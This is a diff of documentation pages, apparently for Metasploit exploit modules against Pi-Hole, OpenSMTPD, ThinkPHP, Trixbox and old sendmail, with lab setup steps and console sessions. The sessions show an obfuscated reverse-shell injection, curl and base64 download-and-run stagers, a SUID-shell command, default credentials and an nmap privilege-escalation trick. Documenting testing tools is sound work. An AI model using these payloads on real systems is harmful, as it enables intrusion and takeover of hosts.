+  [*] Shellcode: 818CC59E2B82&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN("2f62696e2f6563686f202d6e6520275c7836645c7836625c7836365c7836395c7836365c7836665c7832305c7832665c7837345c7836645c7837305c7832665c7837335c7837365c7836635c7836615c7836325c7833625c7832305c7836655c7836335c7832305c7833315c7833395c7833325c7832655c7833315c7833365c7833385c7832655c7833325c7832655c7833315c7833395c7833395c7832305c7833385c7833385c7833385c7833385c7832305c7833305c7833635c7832665c7837345c7836645c7837305c7832665c7837335c7837365c7836635c7836615c7836325c7832305c7837635c7832305c7832665c7836325c7836395c7836655c7832665c7837335c7836385c7832305c7833655c7832665c7837345c7836645c7837305c7832665c7837335c7837365c7836635c7836615c7836325c7832305c7833325c7833655c7832365c7833315c7833625c7832305c7837325c7836645c7832305c7832665c7837345c7836645c7837305c7832665c7837335c7837365c7836635c7836615c783632277c7368"));'&&
+  [*] Sending Exploit
+  [*] Command shell session 1 opened (1.1.1.1:8888 -> 2.2.2.2:40226) at 2020-05-28 09:50:18 -0400
+  [*] Attempting to clean 8D540FBF0F5F from config
+  [*] Attempting to clean 818CC59E2B82 from config
+  
+  id
+  uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  uname -a
+  Linux ubuntu1804 4.15.0-99-generic #100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+  cat /etc/os-release
+  NAME="Ubuntu"
+  VERSION="18.04 LTS (Bionic Beaver)"
+  ID=ubuntu
+  ID_LIKE=debian
+  PRETTY_NAME="Ubuntu 18.04 LTS"
+  VERSION_ID="18.04"
+  HOME_URL="https://www.ubuntu.com/"
+  SUPPORT_URL="https://help.ubuntu.com/"
+  BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
+  PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
+  VERSION_CODENAME=bionic
+  UBUNTU_CODENAME=bionic
+  ```

documentation/modules/exploit/unix/http/pihole_whitelist_exec.md

@@ -0,0 +1,84 @@
+## Vulnerable Application
+
+This exploits a command execution vulnerability in Pi-Hole <= 3.3. When adding a 
+new domain to the whitelist, it is possible to chain a command to 
+the domain that is run on the OS.
+
+### Setup
+
+Install Pi-Hole [Pi-Hole 3.2.1](https://github.com/pi-hole/pi-hole/releases/tag/v3.2.1)
+with the following commands:
+
+```
+sudo git clone --depth=1 -b v3.2.1 https://github.com/pi-hole/pi-hole.git /etc/.pihole
+# replace 'git clone' with 'git clone -b v3.2.1'
+sudo nano /etc/.pihole/automated\ install/basic-install.sh
+sudo /etc/.pihole/automated\ install/basic-install.sh
+```
+
+Pi-Hole attempts to install the latest versions of the software.  Modifying the git clone
+command will force it to install the old AdminLTE and Pi-Hole versions.  However this
+will make FTL fail to install.
+
+Answer everything with the default.
+
+Lastly, we need to create one file which wasn't made.
+
+```
+sudo touch /etc/pihole/GitHubVersions
+```
+
+This will be enough to make it exploitable, however the dashboard won't fully work since some
+other components were installed which are too new for it to work with.
+
+If you wish to install FTL, follow the [directions](https://docs.pi-hole.net/ftldns/compile/).
+However, when cloning the FTL repo, add the flag `-b v2.13.1` to pull an age appropriate version.
+Also, the service may not install correctly.  However simply running `sudo /usr/bin/pihole-FTL`
+will start it successfully.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/unix/http/pihole_whitelist_exec```
+  4. Do: ```set rhosts```
+  5. Do: ```run```
+  6. You should get a shell.
+
+## Options
+
+### Password
+
+Password for the web interface.  Randomly set on install.  Use `pihole -a -p` to change/remove it.
+
+## Scenarios
+
+### Pi-Hole 3.2.1 with AdminLTE 3.2.1 on Ubuntu 18.04
+
+  ```
+  msf5 > use exploit/unix/http/pihole_whitelist_exec 
+  msf5 exploit(unix/http/pihole_whitelist_exec) > set rhosts 2.2.2.2
+  rhosts => 2.2.2.2
+  msf5 exploit(unix/http/pihole_whitelist_exec) > set verbose true
+  verbose => true
+  msf5 exploit(unix/http/pihole_whitelist_exec) > run
+  
+  [*] Started reverse TCP handler on 1.1.1.1:4444 
+  [+] Version Detected: 3.2.1
+  [*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgCgGgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/DaQVx.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/QUFVT' < '/tmp/DaQVx.b64' ; chmod +x '/tmp/QUFVT' ; '/tmp/QUFVT' ; rm -f '/tmp/QUFVT' ; rm -f '/tmp/DaQVx.b64'"]
+  [*] Using cookie: PHPSESSID=j8o7g4m3e30279850hi275mqhk;
+  [*] Using token: OoSESvgJJEWq7mvYBEOJaa/6jyA0GRy56pRZvy93IlU=
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (980808 bytes) to 2.2.2.2
+  [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:44212) at 2020-05-13 23:25:19 -0400
+  [*] Command Stager progress - 100.00% done (763/763 bytes)
+  
+  meterpreter > getuid
+  Server username: no-user @ ubuntu1804 (uid=33, gid=33, euid=33, egid=33)
+  meterpreter > sysinfo
+  Computer     : 2.2.2.2
+  OS           : Ubuntu 18.04 (Linux 4.15.0-20-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  ```

documentation/modules/exploit/unix/local/emacs_movemail.md

@@ -17,25 +17,23 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
 
-### Targets
-
-```
-Id  Name
---  ----
-0   /usr/lib/crontab.local
-```
-
 ## Verification Steps
 
 Follow [Setup](#setup) and [Scenarios](#scenarios).
 
+## Targets
+
+### 0
+
+This uses `/usr/lib/crontab.local` to execute code.
+
 ## Options
 
-**MOVEMAIL**
+### MOVEMAIL
 
 Set this to the absolute path to the SUID-root `movemail` executable.
 
-**CMD**
+### CMD
 
 If your payload is `cmd/unix/generic` (suggested default), set this to
 the command you want to run as root. The provided default will create a
@@ -47,19 +45,29 @@ SUID-root shell at `/tmp/sh`.
 
 ```
 msf5 > use exploit/unix/local/emacs_movemail
-msf5 exploit(unix/local/emacs_movemail) > show missing
+msf5 exploit(unix/local/emacs_movemail) > options
 
 Module options (exploit/unix/local/emacs_movemail):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SESSION                   yes       The session to run this module on.
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   MOVEMAIL  /etc/movemail    yes       Path to movemail
+   SESSION                    yes       The session to run this module on.
 
 
 Payload options (cmd/unix/generic):
 
-   Name  Current Setting  Required  Description
-   ----  ---------------  --------  -----------
+   Name  Current Setting                       Required  Description
+   ----  ---------------                       --------  -----------
+   CMD   cp /bin/sh /tmp && chmod u+s /tmp/sh  yes       The command string to execute
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   /usr/lib/crontab.local
+
 
 msf5 exploit(unix/local/emacs_movemail) > set session -1
 session => -1

documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md

@@ -11,21 +11,20 @@ root or nobody user, depending on the kind of grammar OpenSMTPD uses.
 1. Download [OpenBSD 6.6](https://cdn.openbsd.org/pub/OpenBSD/6.6/amd64/install66.iso)
 2. Install the system
 
-### Targets
-
-```
-Id  Name
---  ----
-0   OpenSMTPD < 6.6.4 (automatic grammar selection)
-```
-
 ## Verification Steps
 
 Follow [Setup](#setup) and [Scenarios](#scenarios).
 
+## Targets
+
+### 0
+
+This targets OpenSMTPD versions < 6.6.4 by automatically selecting the
+appropriate grammar.
+
 ## Options
 
-**SESSION**
+### SESSION
 
 Set this to a valid session ID on an OpenBSD target.
 
@@ -35,13 +34,17 @@ Set this to a valid session ID on an OpenBSD target.
 
 ```
 msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe
-msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > show missing
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > options
 
 Module options (exploit/unix/local/opensmtpd_oob_read_lpe):
 
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    SESSION                   yes       The session to run this module on.
+   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT  25               yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
 
 
 Payload options (cmd/unix/reverse_netcat):
@@ -49,6 +52,15 @@ Payload options (cmd/unix/reverse_netcat):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   OpenSMTPD < 6.6.4 (automatic grammar selection)
+
 
 msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
 lhost => 172.16.249.1
@@ -61,7 +73,7 @@ msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
 [*] Started reverse TCP handler on 172.16.249.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] OpenSMTPD 6.6.0 is using new grammar
-[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
+[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794.
 [*] Started service listener on 0.0.0.0:25
 [*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true
 [*] Client 172.16.249.137:37747 connected
@@ -106,7 +118,7 @@ msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
 [*] Started reverse TCP handler on 172.16.249.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] OpenSMTPD 6.0.4 is using old grammar
-[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794
+[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794.
 [*] Started service listener on 0.0.0.0:25
 [*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true
 [*] Client 172.16.249.138:10203 connected

documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md

@@ -18,26 +18,24 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
 
-### Targets
-
-```
-Id  Name
---  ----
-0   @(#)version.c       5.51 (Berkeley) 5/2/86
-```
-
 ## Verification Steps
 
 Follow [Setup](#setup) and [Scenarios](#scenarios).
 
+## Targets
+
+### 0
+
+This targets `sendmail` version 5.51 from 1986-05-02.
+
 ## Options
 
-**RPORT**
+### RPORT
 
 Set this to the target port. The default is 25 for `sendmail`, but the
 port may be forwarded when NAT (SLiRP) is used in SIMH.
 
-**PAYLOAD**
+### PAYLOAD
 
 Set this to a Unix command payload. Currently, only `cmd/unix/reverse`
 and `cmd/unix/generic` are supported.
@@ -48,13 +46,14 @@ and `cmd/unix/generic` are supported.
 
 ```
 msf5 > use exploit/unix/smtp/morris_sendmail_debug
-msf5 exploit(unix/smtp/morris_sendmail_debug) > show missing
+msf5 exploit(unix/smtp/morris_sendmail_debug) > options
 
 Module options (exploit/unix/smtp/morris_sendmail_debug):
 
    Name    Current Setting  Required  Description
    ----    ---------------  --------  -----------
    RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT   25               yes       The target port (TCP)
 
 
 Payload options (cmd/unix/reverse):
@@ -62,6 +61,15 @@ Payload options (cmd/unix/reverse):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   @(#)version.c       5.51 (Berkeley) 5/2/86
+
 
 msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1

documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md

@@ -15,21 +15,19 @@ SMTP interaction with OpenSMTPD to execute a command as the root user.
 4. Execute `/etc/rc.d/smtpd restart` to restart OpenSMTPD
 5. Execute `ifconfig` and look for an appropriate target IP
 
-### Targets
-
-```
-Id  Name
---  ----
-0   OpenSMTPD < 6.6.1
-```
-
 ## Verification Steps
 
 Follow [Setup](#setup) and [Scenarios](#scenarios).
 
+## Targets
+
+### 0
+
+This targets OpenSMTPD versions < 6.6.1.
+
 ## Options
 
-**RCPT_TO**
+### RCPT_TO
 
 Set this to a valid mail recipient. The default is `root`.
 
@@ -39,13 +37,15 @@ Set this to a valid mail recipient. The default is `root`.
 
 ```
 msf5 > use exploit/unix/smtp/opensmtpd_mail_from_rce
-msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > show missing
+msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > options
 
 Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):
 
-   Name    Current Setting  Required  Description
-   ----    ---------------  --------  -----------
-   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   RCPT_TO  root             yes       Valid mail recipient
+   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT    25               yes       The target port (TCP)
 
 
 Payload options (cmd/unix/reverse_netcat):
@@ -53,6 +53,15 @@ Payload options (cmd/unix/reverse_netcat):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   OpenSMTPD < 6.6.1
+
 
 msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 172.16.249.137
 rhosts => 172.16.249.137

documentation/modules/exploit/unix/webapp/thinkphp_rce.md

@@ -0,0 +1,144 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits one of two PHP injection vulnerabilities in the
+ThinkPHP web framework to execute code as the web user.
+
+Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
+vulnerable to a separate vulnerability. The module will automatically
+attempt to detect the version of the software.
+
+Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
+
+### Setup
+
+1. `git clone https://github.com/vulhub/vulhub`
+2. `cd vulhub/thinkphp/5-rce` for 5.0.20 or `cd vulhub/thinkphp/5.0.23-rce` for 5.0.23
+3. `docker-compose up -d`
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Options
+
+### SRVPORT
+
+If you are testing the [Docker container](#setup), which binds to port
+8080 by default, and you are using an HTTP(S) command stager, set this
+to a different port to bind the command stager server to.
+
+## Scenarios
+
+### ThinkPHP 5.0.20 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce)
+
+```
+msf5 > use exploit/unix/webapp/thinkphp_rce
+msf5 exploit(unix/webapp/thinkphp_rce) > options
+
+Module options (exploit/unix/webapp/thinkphp_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8080             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf5 exploit(unix/webapp/thinkphp_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(unix/webapp/thinkphp_rce) > set lhost 192.168.1.3
+lhost => 192.168.1.3
+msf5 exploit(unix/webapp/thinkphp_rce) > set srvport 8888
+srvport => 8888
+msf5 exploit(unix/webapp/thinkphp_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.3:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. ThinkPHP 5.0.20 is a vulnerable version.
+[*] Targeting ThinkPHP 5.0.20 automatically
+[*] Using URL: http://0.0.0.0:8888/a81nrUs9fCfJSX
+[*] Local IP: http://192.168.1.3:8888/a81nrUs9fCfJSX
+[*] Generated command stager: ["curl -so /tmp/TbEGgqIl http://192.168.1.3:8888/a81nrUs9fCfJSX;chmod +x /tmp/TbEGgqIl;/tmp/TbEGgqIl;rm -f /tmp/TbEGgqIl"]
+[*] Executing command: curl -so /tmp/TbEGgqIl http://192.168.1.3:8888/a81nrUs9fCfJSX;chmod +x /tmp/TbEGgqIl;/tmp/TbEGgqIl;rm -f /tmp/TbEGgqIl
+[*] Client 192.168.1.3 (curl/7.52.1) requested /a81nrUs9fCfJSX
+[*] Sending payload to 192.168.1.3 (curl/7.52.1)
+[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:55132) at 2020-05-01 04:25:29 -0500
+[+] Successfully executed command: curl -so /tmp/TbEGgqIl http://192.168.1.3:8888/a81nrUs9fCfJSX;chmod +x /tmp/TbEGgqIl;/tmp/TbEGgqIl;rm -f /tmp/TbEGgqIl
+[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: no-user @ 099b50f07ffe (uid=33, gid=33, euid=33, egid=33)
+meterpreter > sysinfo
+Computer     : 172.19.0.2
+OS           : Debian 9.4 (Linux 4.19.76-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+### ThinkPHP 5.0.23 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce)
+
+```
+msf5 exploit(unix/webapp/thinkphp_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.3:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. ThinkPHP 5.0.23 is a vulnerable version.
+[*] Targeting ThinkPHP 5.0.23 automatically
+[*] Using URL: http://0.0.0.0:8888/hVN9Y2ju
+[*] Local IP: http://192.168.1.3:8888/hVN9Y2ju
+[*] Generated command stager: ["curl -so /tmp/tHWxdQqn http://192.168.1.3:8888/hVN9Y2ju;chmod +x /tmp/tHWxdQqn;/tmp/tHWxdQqn;rm -f /tmp/tHWxdQqn"]
+[*] Executing command: curl -so /tmp/tHWxdQqn http://192.168.1.3:8888/hVN9Y2ju;chmod +x /tmp/tHWxdQqn;/tmp/tHWxdQqn;rm -f /tmp/tHWxdQqn
+[*] Client 192.168.1.3 (curl/7.52.1) requested /hVN9Y2ju
+[*] Sending payload to 192.168.1.3 (curl/7.52.1)
+[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.3:55145) at 2020-05-01 04:26:44 -0500
+[+] Successfully executed command: curl -so /tmp/tHWxdQqn http://192.168.1.3:8888/hVN9Y2ju;chmod +x /tmp/tHWxdQqn;/tmp/tHWxdQqn;rm -f /tmp/tHWxdQqn
+[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: no-user @ b4be164434d3 (uid=33, gid=33, euid=33, egid=33)
+meterpreter > sysinfo
+Computer     : 172.18.0.2
+OS           : Debian 9.6 (Linux 4.19.76-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

documentation/modules/exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce.md

@@ -0,0 +1,264 @@
+## Vulnerable Application
+
+### Description
+
+  This module exploits an authenticated OS command injection
+  vulnerability found in Trixbox CE version 1.2.0 to 2.8.0.4
+  inclusive in the "network" POST parameter of the
+  "/maint/modules/endpointcfg/endpoint_devicemap.php" page.
+  Successful exploitation allows for arbitrary command execution
+  on the underlying operating system as the "asterisk" user.
+  Users can easily elevate their privileges to the "root" user
+  however by executing "sudo nmap --interactive" followed by "!sh"
+  from within nmap.
+
+### Installation And Setup
+
+  1. Download the latest version of Trixbox CE (i.e. [v2.8.0.4 ISO](https://netcologne.dl.sourceforge.net/project/asteriskathome/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso)).
+  2. Set up a new CentOS machine in VirtualBox or VMWare and load the ISO. 
+  Be sure to disable any autosetup features of VMWare or VirtualBox. 
+  Follow the install prompts and note the `root` password you choose to use. 
+  Once `Package Installation` appears on the screen, wait for the system 
+  to finish rebooting several times, after which the following screen 
+  should be displayed:
+  ```
+  CentOS release 4.3 (Final)
+  Kernel 2.6.9-34.EL on an i686
+
+  asterisk1 login:
+  ```
+  3. Log into via the terminal using the username `root` and the password 
+  you set for the `root` user during installation.
+  4. A prompt similar to the following should be displayed:
+  ```
+  For access to the trixbox web GUI use this URL: http://192.168.205.144
+  ```
+  5. Once this prompt is displayed, take the IP address and browse 
+  to the URL http://*IP ADDRESS*/maint/, then log in with the default 
+  administrative credentials (`maint`:`password`).
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Scenarios
+
+### Trixbox CE v2.8.0.4
+```
+msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.8
+rhosts => 192.168.1.8
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options
+
+Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  password         yes       Password to login with
+   HttpUsername  maint            yes       User to login with
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.1.8      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT         80               yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Linux Dropper)
+
+
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10
+lhost => 192.168.1.10
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.10:4444
+[*] 192.168.1.8:80 - Authenticating using "maint:password" credentials...
+[+] 192.168.1.8:80 - Authenticated successfully.
+[+] 192.168.1.8:80 - Trixbox CE v2.8.0.4 identified.
+[*] 192.168.1.8:80 - Sending payload (150 bytes)...
+[*] Sending stage (980808 bytes) to 192.168.1.8
+[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.8:38680) at 2020-05-02 03:55:24 -0400
+[*] Command Stager progress - 100.00% done (799/799 bytes)
+
+meterpreter > sysinfo
+Computer     : trixbox1.localdomain
+OS           : CentOS 5.5 (Linux 2.6.18-164.11.1.el5)
+Architecture : i686
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > shell
+Process 9259 created.
+Channel 1 created.
+id
+uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
+whoami
+asterisk
+```
+
+### Trixbox CE v2.4.0
+```
+msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set rhosts 192.168.1.7
+rhosts => 192.168.1.7
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options
+
+Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  password         yes       Password to login with
+   HttpUsername  maint            yes       User to login with
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.1.7      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT         80               yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Linux Dropper)
+
+
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set lhost 192.168.1.10
+lhost => 192.168.1.10
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.10:4444
+[*] 192.168.1.7:80 - Authenticating using "maint:password" credentials...
+[+] 192.168.1.7:80 - Authenticated successfully.
+[+] 192.168.1.7:80 - Trixbox CE v2.4.0 identified.
+[*] 192.168.1.7:80 - Sending payload (150 bytes)...
+[*] Sending stage (980808 bytes) to 192.168.1.7
+[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.7:4478) at 2020-05-02 03:52:53 -0400
+[*] Command Stager progress - 100.00% done (799/799 bytes)
+
+meterpreter > sysinfo
+Computer     : trixbox1.localdomain
+OS           : CentOS 5 (Linux 2.6.18-53.1.4.el5)
+Architecture : i686
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > shell
+Process 14144 created.
+Channel 1 created.
+id
+uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
+whoami
+asterisk
+```
+
+### Trixbox CE v1.2.0
+```
+msf5 > use exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce 
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > show options
+
+Module options (exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword  password         yes       Password to login with
+   HttpUsername  maint            yes       User to login with
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT         80               yes       The target port (TCP)
+   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT       8080             yes       The local port to listen on.
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                        no        The URI to use for this exploit (default is random)
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Linux Dropper)
+
+
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set LHOST 192.168.205.1
+LHOST => 192.168.205.1
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set SRVHOST 192.168.205.1
+SRVHOST => 192.168.205.1
+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > set RHOSTS 192.168.205.148
+RHOSTS => 192.168.205.148
